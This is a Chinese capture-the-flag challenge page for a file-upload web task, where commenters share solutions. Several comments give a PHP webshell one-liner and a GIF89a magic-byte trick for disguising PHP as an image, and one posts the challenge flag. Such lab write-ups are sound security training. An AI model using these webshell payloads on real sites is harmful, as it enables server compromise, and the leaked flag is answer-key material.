列表

详情


Upload 1

HackINI-2023   WEB   已通过

题目作者: 未知

一  血: ‌‌‌‌‌18718578940

一血奖励: 0金币

解  决: 293

提  示:

描  述: We added a verification. Bypass it. **Author**: souad

去做题

pb9231 @ 2024-05-17 23:22:18 👍0

尝试上传图片文件,发现可以上传(图片要小), 用010 editor 打开图片将php一句话木马<?php @eval($_POST['shell']);?>写入图片末尾,保存后修改图片扩展名为.php 上传图片成功,用蚁剑连接,在根目录下找到flag.txt


TheShy师傅 @ 2024-06-04 23:22:18 👍0

为什么我一上传就显示页面丢失,什么都不返回给我?无论是什么免杀木马都不行?


cqy123 @ 2024-05-07 23:22:18 👍0

上传了一个很小的图片,然后抓包,图片内容的头不要动,后面加入一句话木马,乙箭链接


15614005380 @ 2024-03-07 23:22:18 👍0

改改文件头就行


ekkoyu @ 2024-02-07 23:22:18 👍0

?的,只能上传一个小小的图片?


FADogeCTF @ 2024-01-07 23:22:18 👍0

制作图片马,直接以php文件上传就可以连接webshell


868954104 @ 2024-01-07 23:22:18 👍0

shellmates{PoLyg10t_F1l3s_Byp4$S} GIF89a <?php system('cat /flag.txt')?>


lolthis223 @ 2023-10-07 23:22:18 👍0

直接在你的php函数上面加一个GIF89a就可以上传了


不会编程的崽 @ 2023-10-07 23:22:18 👍0

File too large, this service is meant for small files only 这图片要求的多小啊


tcstwz @ 2023-10-07 23:22:18 👍0

也可以加文件头


xiaobai568 @ 2023-10-07 23:22:18 👍1

构造图片马之后,将后缀改为php就能连上了